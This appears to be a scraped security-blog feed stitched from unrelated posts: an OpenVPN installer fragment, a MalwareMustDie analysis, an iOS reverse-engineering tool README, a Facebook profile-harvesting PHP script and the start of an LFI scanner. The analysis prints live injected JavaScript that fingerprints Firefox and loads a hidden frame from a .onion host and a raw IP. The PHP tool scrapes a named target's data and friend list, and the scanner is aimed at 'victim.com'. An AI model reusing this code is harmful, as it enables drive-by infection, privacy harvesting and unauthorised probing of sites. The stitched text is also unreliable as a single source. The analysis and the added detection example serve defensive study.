-rf ~/easy-rsa.tar.gz fi cd /etc/openvpn/easy-rsa/2.0/ # Let's fix one thing first... cp -u -p openssl-1.0.0.cnf openssl.cnf # Fuck you NSA - 1024 bits was the default for Debian Wheezy and older sed -i 's|export KEY_SIZE=1024|export KEY_SIZE=2048|' /etc/openvpn/easy-rsa/2.0/vars # Create the PKI . /etc/openvpn/easy-rsa/2.0/vars . /etc/openvpn/easy-rsa/2.0/clean-all # The following lines are from build-ca. I don't use that script directly # because it's interactive and we don't want that. 
# Yes, this could break
# the installation script if build-ca changes in the future.
export EASY_RSA="${EASY_RSA:-.}"
"$EASY_RSA/pkitool" --initca $*
# Same as the last time, we are going to run build-key-server
export EASY_RSA="${EASY_RSA:-.}"
"$EASY_RSA/pkitool" --server server
# Now the client keys. We need to set KEY_CN or the stupid pkitool will cry
export KEY_CN="$CLIENT"
export EASY_RSA="${EASY_RSA:-.}"
"$EASY_RSA/pkitool" $CLIENT
# DH params
. /etc/openvpn/easy-rsa/2.0/build-dh
# Let's configure the server
cd /usr/share/doc/openvpn/examples/sample-config-files
gunzip -d server.conf.gz
cp server.conf /etc/openvpn/
cd /etc/openvpn/easy-rsa/2.0/keys
cp ca.crt ca.key dh2048.pem server.crt server.key /etc/openvpn
cd /etc/openvpn/
# Set the server configuration
sed -i 's|dh dh1024.pem|dh dh2048.pem|' server.conf
sed -i 's|;push "redirect-gateway def1 bypass-dhcp"|push "redirect-gateway def1 bypass-dhcp"|' server.conf
sed -i "s|port 1194|port $PORT|" server.conf
# DNS
case $DNS in
    1)
    # Obtain the resolvers from resolv.conf and use them for OpenVPN
    grep -v '#' /etc/resolv.conf | grep 'nameserver' | grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | while read line; do
        sed -i "/;push \"dhcp-option DNS 208.67.220.220\"/a\push \"dhcp-option DNS $line\"" server.conf
    done
    ;;
    2)
    sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 208.67.222.222"|' server.conf
    sed -i 's|;push "dhcp-option DNS 208.67.220.220"|push "dhcp-option DNS 208.67.220.220"|' server.conf
    ;;
    3)
    sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 4.2.2.2"|' server.conf
    sed -i 's|;push "dhcp-option DNS 208.67.220.220"|push "dhcp-option DNS 4.2.2.4"|' server.conf
    ;;
    4)
    sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 129.250.35.250"|' server.conf
    sed -i 's|;push "dhcp-option DNS 208.67.220.220"|push "dhcp-option DNS 129.250.35.251"|' server.conf
    ;;
    5)
    sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 74.82.42.42"|' server.conf
    ;;
    6)
    sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 77.88.8.8"|' server.conf
    sed -i 's|;push "dhcp-option DNS 208.67.220.220"|push "dhcp-option DNS 77.88.8.1"|' server.conf
    ;;
esac
# Listen at port 53 too if user wants that
if [[ "$ALTPORT" = 'y' ]]; then
    iptables -t nat -A PREROUTING -p udp -d $IP --dport 53 -j REDIRECT --to-port $PORT
    sed -i "1 a\iptables -t nat -A PREROUTING -p udp -d $IP --dport 53 -j REDIRECT --to-port $PORT" /etc/rc.local
fi
# Enable net.ipv4.ip_forward for the system
sed -i 's|#net.ipv4.ip_forward=1|net.ipv4.ip_forward=1|' /etc/sysctl.conf
# Avoid an unneeded reboot
echo 1 > /proc/sys/net/ipv4/ip_forward
# Set iptables
if [[ "$INTERNALNETWORK" = 'y' ]]; then
    iptables -t nat -A POSTROUTING -s 10.8.0.0/24 ! -d 10.8.0.0/24 -j SNAT --to $IP
    sed -i "1 a\iptables -t nat -A POSTROUTING -s 10.8.0.0/24 ! -d 10.8.0.0/24 -j SNAT --to $IP" /etc/rc.local
else
    iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to $IP
    sed -i "1 a\iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to $IP" /etc/rc.local
fi
# And finally, restart OpenVPN
/etc/init.d/openvpn restart
# Try to detect a NATed connection and ask about it to potential LowEndSpirit
# users
EXTERNALIP=$(wget -qO- ipv4.icanhazip.com)
if [[ "$IP" != "$EXTERNALIP" ]]; then
    echo ""
    echo "Looks like your server is behind a NAT!"
    echo ""
    echo "If your server is NATed (LowEndSpirit), I need to know the external IP"
    echo "If that's not the case, just ignore this and leave the next field blank"
    read -p "External IP: " -e USEREXTERNALIP
    if [[ "$USEREXTERNALIP" != "" ]]; then
        IP=$USEREXTERNALIP
    fi
fi
# IP/port set on the default client.conf so we can add further users
# without asking for them
sed -i "s|remote my-server-1 1194|remote $IP $PORT|" /usr/share/doc/openvpn/examples/sample-config-files/client.conf
# Generate the client.ovpn
newclient "$CLIENT"
echo ""
echo "Finished!"
echo ""
echo "Your client config is available at ~/$CLIENT.ovpn"
echo "If you want to add more clients, you simply need to run this script another time!"
fi

To begin the auto installer, type:
./openvpn-install.sh

Now, on your main Windows machine, open Notepad. Go back to PuTTY and type:
cat ro0ted.ovpn
Copy all of it to the clipboard and paste it in Notepad > File > Save as > WhateverYouNamedTheClient.ovpn

Check if your OpenVPN server is running; type:
ps ax|grep openvpn
You should see something like this:

Traffic forwarding has to be enabled for the VPN connection to work. Type:
nano /etc/sysctl.conf
and enable IPv4 forwarding by un-commenting the line "net.ipv4.ip_forward=0", removing the # sign and changing 0 to 1 so it looks like this:
net.ipv4.ip_forward=1
Ctrl + X, then select Y.

Enable masquerading in the firewall; type:
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE

Go to Windows. Download OpenVPN: http://openvpn.net/index.php/open-source/downloads.html
After you install it, transfer the ovpn-client1.tar.gz archive to your PC and unpack it to your OpenVPN GUI's config folder (usually "C:\Program Files(x86)\OpenVPN\config\").
Start OpenVPN GUI with right click, Run as Administrator (it works only when you run it as administrator). Right click on its System Tray icon and click Connect.
Source
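An added example, not part of the installer script or the post above: it pulls out the two places where that installer trusts its input, the nameservers copied out of resolv.conf (validated per octet here, since the installer's grep pattern also accepts 999.1.1.1) and the sed edits to server.conf (verified after the fact, because a sed substitution whose pattern no longer matches a newer sample config silently does nothing). The function names, the sample resolv.conf and the stripped-down server.conf are constructed for this example.

```shell
#!/bin/sh
# Added example: validate resolv.conf nameservers before pushing them to
# OpenVPN clients, apply the installer's server.conf edits, then verify them.
# Sample inputs below are constructed under a mktemp directory.

# Exit 0 when $1 is a dotted quad with every octet in 0..255.
valid_ipv4() {
    addr="$1"
    case "$addr" in
        *[!0-9.]*|.*|*.|*..*|"") return 1 ;;
    esac
    n=0
    old_ifs="$IFS"; IFS=.
    for octet in $addr; do
        n=$((n + 1))
        if [ "$octet" -gt 255 ]; then IFS="$old_ifs"; return 1; fi
    done
    IFS="$old_ifs"
    [ "$n" -eq 4 ]
}

# Emit one push directive per valid nameserver in a resolv.conf-style file ($1).
resolv_to_push() {
    grep -v '^[[:space:]]*#' "$1" | awk '$1 == "nameserver" { print $2 }' |
    while IFS= read -r ip; do
        if valid_ipv4 "$ip"; then
            printf 'push "dhcp-option DNS %s"\n' "$ip"
        fi
    done
}

# Apply the installer's edits to a server.conf ($1) for port $2, then append
# DNS pushes derived from the resolv.conf given as $3.
harden_server_conf() {
    conf="$1"; port="$2"; resolv="$3"
    sed -i 's|dh dh1024.pem|dh dh2048.pem|' "$conf"
    sed -i 's|;push "redirect-gateway def1 bypass-dhcp"|push "redirect-gateway def1 bypass-dhcp"|' "$conf"
    sed -i "s|port 1194|port $port|" "$conf"
    resolv_to_push "$resolv" >> "$conf"
}

# Exit 0 only when every expected line is present in $1 for port $2;
# report what is missing on stderr otherwise.
check_server_conf() {
    conf="$1"; port="$2"; rc=0
    for want in '^dh dh2048\.pem$' \
                '^push "redirect-gateway def1 bypass-dhcp"$' \
                "^port $port\$" \
                '^push "dhcp-option DNS [0-9.]*"$'; do
        if ! grep -q -- "$want" "$conf"; then
            echo "missing: $want" >&2
            rc=1
        fi
    done
    return "$rc"
}

# Constructed sample inputs: one bogus resolver, one stock-looking server.conf.
demo_dir=$(mktemp -d)
cat > "$demo_dir/resolv.conf" <<'EOF'
# constructed resolv.conf
nameserver 10.0.0.53
nameserver 999.1.1.1
search example.test
nameserver 192.0.2.1
EOF
cat > "$demo_dir/server.conf" <<'EOF'
port 1194
dh dh1024.pem
;push "redirect-gateway def1 bypass-dhcp"
;push "dhcp-option DNS 208.67.222.222"
;push "dhcp-option DNS 208.67.220.220"
EOF

check_server_conf "$demo_dir/server.conf" 443 || echo "stock config fails the check, as expected"
harden_server_conf "$demo_dir/server.conf" 443 "$demo_dir/resolv.conf"
check_server_conf "$demo_dir/server.conf" 443 && echo "hardened config passes"
cat "$demo_dir/server.conf"
rm -rf "$demo_dir"
```

resolv_to_push stands in for the installer's grep-and-while loop in DNS case 1, and check_server_conf is what you would run after the script (or after any hand edit) to confirm the expected lines are actually there rather than assuming the sed calls matched.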
1 reply. Tagged with: dhcp-option, dns (and 3 more)
-
# MalwareMustDie!
# This is the malicious Javascript set codes injected to the Freedom Hosting site
# It contains the IFRAMER Malware method to redirect the victim to infector site, in url:
# http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0
#
# Original copy at: www.twitlonger.com/show/n_1rlo0uu
# See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infecting every visitor to that site!!
# Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected by this IFRAMER.
# Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html
# Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
# Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html
# Ref: http://www.twitlonger.com/show/n_1rlo0uu
# Ref: http://pastebin.com/bu2Ya0n6
# Ref: http://pastebin.com/pmGEj9bV

// Case 1
function createCookie(name,value,minutes) {
    if (minutes) {
        var date = new Date();
        date.setTime(date.getTime()+(minutes*60*1000));
        var expires = "; expires="+date.toGMTString();
    }
    else var expires = "";
    document.cookie = name+"="+value+expires+"; path=/";
}
function readCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for(var i=0;i < ca.length;i++) {
        var c = ca[i];
        while (c.charAt(0)==' ') c = c.substring(1,c.length);
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
    }
    return null;
}
function isFF() {
    return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}
function updatify() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "inline";
    iframe.frameBorder = "0";
    iframe.scrolling = "no";
    iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";
    iframe.height = "5";
    iframe.width = "*";
    document.body.appendChild(iframe);
}
function format_quick() {
    if ( ! readCookie("n_serv") ) {
        createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);
        updatify();
    }
}
function isReady() {
    if ( document.readyState === "interactive" || document.readyState === "complete" ) {
        if ( isFF() ) {
            format_quick();
        }
    } else {
        setTimeout(isReady, 250);
    }
}
setTimeout(isReady, 250);

// Case 2
function createCookie(name, value, minutes) {
    if (minutes) {
        var date = new Date();
        date.setTime(date.getTime() + (minutes * 60 * 1000));
        var expires = "; expires=" + date.toGMTString();
    }
    else var expires = "";
    document.cookie = name + "=" + value + expires + "; path=/";
}
function readCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; i++) {
        var c = ca[i];
        while (c.charAt(0) == ' ') c = c.substring(1, c.length);
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
    }
    return null;
}
function isFF() {
    return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}
function updatify() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "inline";
    iframe.frameBorder = "0";
    iframe.scrolling = "no";
    iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; // <== (1) 1ST CALLBACK SELF EXPLANATORY
    iframe.height = "5";
    iframe.width = "*";
    document.body.appendChild(iframe);
}
function freedomhost() {
    if (!readCookie("n_serv")) {
        createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
        updatify();
    }
}
function isReady() {
    if (document.readyState === "interactive" || document.readyState === "complete") {
        if (isFF()) {
            //window.alert(window.location + "Firefox Detected.")
            freedomhost();
        }
    } else {
        setTimeout(isReady, 250);
    }
}
setTimeout(isReady, 250);

// Noted, same method,
// second script is w/IP info callback, contacting remote host as per marked (1)
IP Address: 65.222.202.53
City: Triadelphia
State or Region: West Virginia
Country: United States
ISP: Verizon Business
Latitude & Longitude: 40.0900-80.6220
Domain: verizonbusiness.com
ZIP Code: 26059
---
#MalwareMustDie! @unixfreaxjp
Source
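As an added example (not part of the MalwareMustDie analysis above), a static indicator scan for the pattern the two scripts share: Firefox-only victim selection, a once-per-visitor cookie, an iframe built at runtime with a five-pixel height, and a hard-coded callback to a raw IP or .onion host. The two input scripts are constructed, 192.0.2.10 is a documentation address standing in for a callback host, and the indicator names and the threshold of four are this example's own choices.

```javascript
// Added example, not part of the MalwareMustDie post above: a static
// indicator scan for the injection pattern it documents. Inputs are
// constructed; 192.0.2.10 is a documentation address, not a real callback.

const INDICATORS = [
  // Firefox-only victim selection (both scripts test mozInnerScreenX / the UA string)
  { name: "firefox-fingerprint", re: /mozInnerScreenX|getBoxObjectFor|\/Firefox\/i\.test/ },
  // cookie written so each visitor is served the frame only once
  { name: "cookie-gate", re: /document\.cookie\s*=/ },
  // frame created at runtime instead of appearing in the page markup
  { name: "runtime-iframe", re: /createElement\(\s*['"]iframe['"]\s*\)/ },
  // one- or two-digit height: a frame meant not to be seen
  { name: "tiny-frame", re: /\.height\s*=\s*['"]\d{1,2}['"]/ },
  // frame attached to the document body
  { name: "frame-append", re: /appendChild\(\s*iframe\s*\)/ },
  // polling readyState before firing
  { name: "ready-poll", re: /setTimeout\(\s*isReady\s*,/ },
];

// Callbacks to a raw IPv4 address or a .onion host are the ones to escalate first.
const RAW_HOST_RE = /^https?:\/\/((\d{1,3}\.){3}\d{1,3}|[a-z2-7]+\.onion)(?=[/:?#]|$)/i;

// Every string literal assigned to a .src property.
function extractCallbacks(src) {
  const urls = [];
  const re = /\.src\s*=\s*['"]([^'"]+)['"]/g;
  let m;
  while ((m = re.exec(src)) !== null) urls.push(m[1]);
  return urls;
}

// Score one script and return what matched. Four or more indicators together
// is the iframer shape; a single one (any embed widget builds an iframe) is not.
function scanScript(src) {
  const hits = INDICATORS.filter((i) => i.re.test(src)).map((i) => i.name);
  const callbacks = extractCallbacks(src);
  const rawHosts = callbacks.filter((u) => RAW_HOST_RE.test(u));
  return { hits, callbacks, rawHosts, verdict: hits.length >= 4 ? "suspicious" : "clean" };
}

// Constructed sample that keeps the structure of the injected code above.
const SAMPLE_INJECT = `
function isFF() { return (window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent)); }
function updatify() {
  var iframe = document.createElement('iframe');
  iframe.frameBorder = "0";
  iframe.src = "http://192.0.2.10/?requestID=00000000-0000-4000-8000-000000000000";
  iframe.height = "5"; iframe.width = "*";
  document.body.appendChild(iframe);
}
function gate() { if (!readCookie("n_serv")) { document.cookie = "n_serv=1; path=/"; updatify(); } }
function isReady() {
  if (document.readyState === "complete") { if (isFF()) { gate(); } }
  else { setTimeout(isReady, 250); }
}
setTimeout(isReady, 250);
`;

// Constructed benign embed: it also builds an iframe, but nothing else matches.
const SAMPLE_EMBED = `
var player = document.createElement('iframe');
player.src = "https://player.example/embed/123";
player.width = "640"; player.height = "360";
document.getElementById("video").appendChild(player);
`;

console.log(JSON.stringify(scanScript(SAMPLE_INJECT), null, 2));
console.log(JSON.stringify(scanScript(SAMPLE_EMBED), null, 2));
```

Run against a page's inline scripts, the output for the injected sample lists all six indicators and the raw-IP callback, while the embed sample trips only runtime-iframe; the point of scoring several weak signals together is that no single one (a cookie write, a created iframe) is suspicious on its own.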
-
iSpy aims to be your one-stop-shop for reverse engineering and dynamic analysis of iOS applications.

Features:
– Easy to use Web GUI
– Class dumps
– Instance tracking
– Automatic jailbreak-detection bypasses
– Automatic SSL certificate pinning bypasses
– Re-implemented objc_msgSend for logging and tracing function calls in realtime
– Cycript integration; access Cycript from your browser!
– Anti-anti-method swizzling
– Automatic detection of vulnerable function calls
– Easy to use soft-breakpoints

The current release is a developer preview; code is subject to change, and will be unstable. However, we appreciate code contributions, feature requests, and bug reports. We currently do not have binary releases, stay tuned!

Injecting iSpy:
1. Once iSpy is installed onto your device, open the Settings application and you should see a new entry for iSpy. Enable the iSpy Global On/Off if it is disabled. From this panel you can also enable hooks for SSL Certificate Pinning, change web server settings, and optional features.
2. From here go to Select Target Apps and enable the switch for whichever applications you want to inject iSpy into.
3. Open any of the selected applications and you should see a Showtime overlay message in the upper right as the application loads; this indicates that iSpy was successfully injected into the process.
4. Open your browser and go to http://<iPad IP Address>:31337. Note that the default port is 31337 but it can be optionally changed in the iOS Settings. If iSpy fails to bind to the desired port it will increment the port number until it successfully finds an unbound port to use; you can see this activity in the Xcode console. We also recommend forwarding your TCP connections over USB using the iPhone Data Protection Suite's tcprelay.sh script.
5. Have fun!

Prerequisites:
+ Xcode 5+ running on OSX 10.8+
+ Any jailbroken iOS device running 32bit iOS 6, 7, or 8. Other versions may work but have not been tested.

Theos Setup
Follow this guide to setup Theos and Ldid.

Clone Repos
First do a recursive clone of the public repo:
git clone https://github.com/BishopFox/iSpy --recursive

Build CocoaHTTPServer
Next we need to build the CocoaHTTPServer dependency; this step is optional as a binary is included with the main iSpy repo.
cd iSpyServer/CocoaHTTPServer/
./build.sh
This will create a new CocoaHTTPServer.a file in the iSpy/libs directory.

Compile iSpy
Next build the main repo: cd back to the root of the main iSpy git repo and:
make clean
make
make package
This will produce a new .deb. If you get the error:
/Applications/Xcode.app/Contents/Developer/usr/bin/make package requires dpkg-deb.
make: *** [internal-package-check] Error 1
it means you need to install the Debian package manager. I use Brew, so it was just a case of running brew install dpkg to get up and running.

Install onto iOS Device
iSpy has three binary dependencies on the iOS device: cycript, preferenceloader and applist. The easiest way to install these is to ssh into your device and use apt-get:
apt-get install cycript applist preferenceloader
After that just install the .deb we compiled in the previous step:
dpkg -i <.deb file>

Cycript Integration
iSpy injects Cycript into the target app automatically by default. In order for the iSpy UI integration to work, you must first install Cycript onto your device (just use Cydia). Once installed, you can access Cycript from the iSpy UI by simply hitting the hotkey (ctrl-`). You can also connect remotely from a command-line, like so:
cycript -r ip_of_your_device:12345

Download Zipball | or clone git here
Sources: https://github.com/BishopFox
iSpy – A reverse engineering framework for iOS.
-
Tagged with: framework, iphone tools (and 2 more)
-
*NAME*: INURL API facebook
*TYPE*: TOOL - Capturing data facebook
*Tested on*: Linux
*EXECUTE*: php exploit.php perfilFacebook
*AUTHOR*: Cleiton Pinheiro / NICK: GoogleINURL
*EMAIL*: inurllbr@gmail.com
*Blog*: http://blog.inurl.com.br
*Twitter*: https://twitter.com/googleinurl
*Fanpage*: https://fb.com/InurlBrasil
*GIT*: https://github.com/googleinurl
*PASTEBIN*: http://pastebin.com/u/Googleinurl
*YOUTUBE*: https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
*PACKETSTORMSECURITY*: http://packetstormsecurity.com/user/googleinurl/
*PRINT*: https://1.bp.blogspot.com/-GByN8EJG974/VKBxtKai66I/AAAAAAAADSQ/tdbuiZIZ0wI/s1600/Untitled-4.jpg <http://i.imgur.com/45BFlNe.png>

*Description:*
The script captures information through a Facebook API. Data that can be extracted: uid, username, name, first_name, middle_name, last_name, fri, locale, pic_small_with_logo, pic_big_with_logo, pic_square_with_logo, pic_with_logo, username
Just to have an affinity, or if the user has not set the privacy of friends, it is possible to extract all friends of the victim.

*Usage info:*
php script.php {id/user}

*Exploit:*
<?php
/*
NAME: INURL API facebook
TYPE: TOOL - Capturing data facebook
Tested on: Linux
EXECUTE: php exploit.php perfilFacebook
AUTHOR: Cleiton Pinheiro / NICK: GoogleINURL
EMAIL: inurllbr@gmail.com
Blog: http://blog.inurl.com.br
Twitter: https://twitter.com/googleinurl
Fanpage: https://fb.com/InurlBrasil
GIT: https://github.com/googleinurl
PASTEBIN: http://pastebin.com/u/Googleinurl
YOUTUBE: https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
PACKETSTORMSECURITY: http://packetstormsecurity.com/user/googleinurl/
PRINT: https://1.bp.blogspot.com/-GByN8EJG974/VKBxtKai66I/AAAAAAAADSQ/tdbuiZIZ0wI/s1600/Untitled-4.jpg

Description:
The script captures information through a Facebook API. Data that can be extracted:
uid, username, name, first_name, middle_name, last_name, fri, locale, pic_small_with_logo,
pic_big_with_logo, pic_square_with_logo, pic_with_logo, username
Just to have an affinity, or if the user has not set the privacy of friends, it is possible to extract all friends of the victim.
------------------------------------------------------
Usage info: php script.php {id/user}
------------------------------------------------------
#PHP Version 5.4.7
#php5-curl LIB
#php5-cli LIB
#Apache 2.4
#allow_url_fopen On
#permission Reading
#Operating system LINUX
------------------------------------------------------
*/
error_reporting(0);
ini_set('display_errors', 0);
!isset($_SESSION) ? session_start() : NULL;
$_SESSION['config'] = array();
system("command clear");
echo menu();

// Plain GET with curl; TLS verification is disabled and redirects are not followed.
function getHttpResponseCode($url) {
    $curl = curl_init();
    //print_r($url);
    curl_setopt($curl, CURLOPT_URL, ($url));
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curl, CURLOPT_HEADER, 0);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 0);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    //curl_setopt($curl, CURLOPT_PROXY,"localhost:8118");
    return curl_exec($curl);
}

if (isset($argv[1]) && !empty($argv[1])) {
    // Graph API lookup of the profile given on the command line, then an FQL query on its uid.
    $_SESSION['config'] = json_decode(getHttpResponseCode("http://graph.facebook.com/{$argv[1]}"), true);
    $_SESSION['config2'] = getHttpResponseCode("http://api.facebook.com/method/fql.query?query=" . urlencode("SELECT uid,username, name, first_name, middle_name, last_name, sex, locale, pic_small_with_logo, pic_big_with_logo, pic_square_with_logo, pic_with_logo, username FROM user WHERE uid ={$_SESSION['config']['id']}"));
    $xml = simplexml_load_string($_SESSION['config2']);
    $array_ = json_decode(json_encode((array) $xml), 1);
    $array = array($xml->getName() => $array_);
    echo "\033[1;34m
================================================================================================================
DADOS FACEBOOK
================================================================================================================
\n";
    echo "\033[1;37m0x\033[0m\033[02;31mLINK:: \033[1;37m" . (isset($_SESSION['config']['link']) ? $_SESSION['config']['link'] : NULL ) . "\n\n";
    echo "\033[1;37m0x\033[0m\033[02;31mID:: \033[1;37m{$array['fql_query_response']['user']['uid']}\n\n";
    echo "\033[1;37m0x\033[0m\033[02;31mUSERNAME:: \033[1;37m{$array['fql_query_response']['user']['username']}\n\n";
    echo "\033[1;37m0x\033[0m\033[02;31mNOME:: \033[1;37m{$array['fql_query_response']['user']['name']}\n\n";
    echo "\033[1;37m0x\033[0m\033[02;31mPRIMEIRO NOME:: \033[1;37m{$array['fql_query_response']['user']['first_name']}\n\n";
    echo "\033[1;37m0x\033[0m\033[02;31mSOBRENOME:: \033[1;37m{$array['fql_query_response']['user']['last_name']}\n\n";
    echo "\033[1;37m0x\033[0m\033[02;31mSEXO:: \033[1;37m{$array['fql_query_response']['user']['sex']}\n\n";
    echo "\033[1;37m0x\033[0m\033[02;31mLOCAL:: \033[1;37m{$array['fql_query_response']['user']['locale']}\n\n";
    echo "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO PEQUENA:: \033[1;37m" . urldecode($array['fql_query_response']['user']['pic_small_with_logo']) . "\n\n";
    echo "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO GRANDE:: \033[1;37m" . urldecode($array['fql_query_response']['user']['pic_big_with_logo']) . "\n\n";
    echo "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO:: \033[1;37m" . urldecode($array['fql_query_response']['user']['pic_square_with_logo']) . "\n\n";
    echo "\033[1;37m0x\033[0m\033[02;31mFOTO:: \033[1;37m" . urldecode($array['fql_query_response']['user']['pic_with_logo']) . "\n\n\033[0m";
    // Friend list via the typeahead endpoint, split on the JSON object openings.
    echo "http://www.facebook.com/ajax/typeahead_friends.php?u={$_SESSION['config']['id']}&__a=1\n";
    $_SESSION['config3'] = getHttpResponseCode("http://www.facebook.com/ajax/typeahead_friends.php?u={$_SESSION['config']['id']}&__a=1");
    echo "================================================================================================================\n";
    $cont = 0;
    $array2 = (explode('{"', $_SESSION['config3']));
    foreach ($array2 as $valores) {
        $valores = str_replace('],"viewer_id":0},"bootloadable":{},"ixData":[]}', '', str_replace(',"n":"","it":null}', '', $valores));
        $valores = str_replace('"u":', "\033[1;37mURL::\033[0m\033[1;34m", str_replace('t":', "\033[1;37mNOME::\033[0m\033[1;34m", str_replace('"i"', "\033[1;37mID::\033[0m\033[1;34m", str_replace('\/', '/', $valores))));
        echo "\033[02;31m[\033[1;37m" . $cont++ . "\033[02;31m]\033[0m - $valores\n";
    }
} else {
    echo menu() . " Falta definir parâmetro de busca, Exemplo=> php face.php usuario\n";
}

function menu() {
    system("command clear");
    return("
\033[1;37m   _____
\033[1;37m  (_____)
\033[1;37m (\033[02;31m() ()\033[1;37m)
\033[1;37m  \   /
\033[1;37m   \ /
\033[1;37m   /=\
\033[1;37m  [___] / Googleinurl - [ INURL API facebook ]
\033[1;37m0xNeither war between hackers, nor peace for the system.
\033[1;37m0x\033[0m\033[02;31mhttp://blog.inurl.com.br
\033[1;37m0x\033[0m\033[02;31mhttps://fb.com/InurlBrasil
\033[1;37m0x\033[0m\033[02;31mhttp://twitter.com/@googleinurl\033[0m
[+] Pesquisa dados facebook, Ex: php face.php zuck
");
}
Source
-
~# python scanner.py

 $$\       $$$$$$$$\ $$$$$$\
 $$ |      $$  _____|\_$$  _|
 $$$$$$\  $$ |      $$ |       $$ |
 \____$$\ $$ |      $$$$$\     $$ |
 $$$$$$$ |$$ |      $$  __|    $$ |
 $$  __$$ |$$ |      $$ |       $$ |
 \$$$$$$$ |$$$$$$$$\ $$ |     $$$$$$\
  \_______|\________|\__|     \______|

 $$$$$$\
 $$  __$$\
 $$ /  \__| $$$$$$$\ $$$$$$\  $$$$$$$\  $$$$$$$\   $$$$$$\   $$$$$$\
 \$$$$$$\  $$  _____|\____$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$  __$$\
  \____$$\ $$ /      $$$$$$$ |$$ |  $$ |$$ |  $$ |$$$$$$$$ |$$ |  \__|
 $$\   $$ |$$ |     $$  __$$ |$$ |  $$ |$$ |  $$ |$$   ____|$$ |
 \$$$$$$  |\$$$$$$$\$$$$$$$ |$$ |  $$ |$$ |  $$ |\$$$$$$$\ $$ |
  \______/  \_______|\_______|\__|  \__|\__|  \__| \_______|\__|

An0th3r LFI sC4Nn3r v1.0

Written by: Claudio Viviani

http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

Usage: scanner.py -u URL -t TARGET_PAGE [-p PORT] [--timeout sec] [-r, --random-agent]

Options:
  -h, --help            show this help message and exit
  -u URL, --url=URL     Insert URL: http[s]://www.victim.com
  -t TARGET, --target=TARGET
                        Insert page: The name of the page to be scanned (Ex. index.php?page=)
  -p PORT, --port=PORT  [Insert Port Number] - Default 80 or 443
  --timeout=TIMEOUT     [Timeout Value] - Default 10
  -r, --random-agent    [Set random UserAgent]

#!/usr/bin/env python26
import optparse
import sys
import urllib2, socket
import random
import re

#
# Banner aLFI
banner = """
 $$\       $$$$$$$$\ $$$$$$\\
 $$ |      $$  _____|\_$$  _|
 $$$$$$\  $$ |      $$ |       $$ |
 \____$$\ $$ |      $$$$$\     $$ |
 $$$$$$$ |$$ |      $$  __|    $$ |
 $$  __$$ |$$ |      $$ |       $$ |
 \$$$$$$$ |$$$$$$$$\ $$ |     $$$$$$\\
  \_______|\________|\__|     \______|

 $$$$$$\\
 $$  __$$\\
 $$ /  \__| $$$$$$$\ $$$$$$\  $$$$$$$\  $$$$$$$\   $$$$$$\   $$$$$$\\
 \$$$$$$\  $$  _____|\____$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$  __$$\\
  \____$$\ $$ /      $$$$$$$ |$$ |  $$ |$$ |  $$ |$$$$$$$$ |$$ |  \__|
 $$\   $$ |$$ |     $$  __$$ |$$ |  $$ |$$ |  $$ |$$   ____|$$ |
 \$$$$$$  |\$$$$$$$\\$$$$$$$ |$$ |  $$ |$$ |  $$ |\$$$$$$$\ $$ |
  \______/  \_______|\_______|\__|  \__|\__|  \__| \_______|\__|

An0th3r LFI sC4Nn3r v1.0

Written by: Claudio Viviani

http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

commandList = optparse.OptionParser('usage: %prog -u URL -t TARGET_PAGE [-p PORT] [--timeout sec] [-r, --random-agent]\n')
commandList.add_option('-u', '--url', action="store", dest="url",
                       help="Insert URL: http://www.victim.com",
                       )
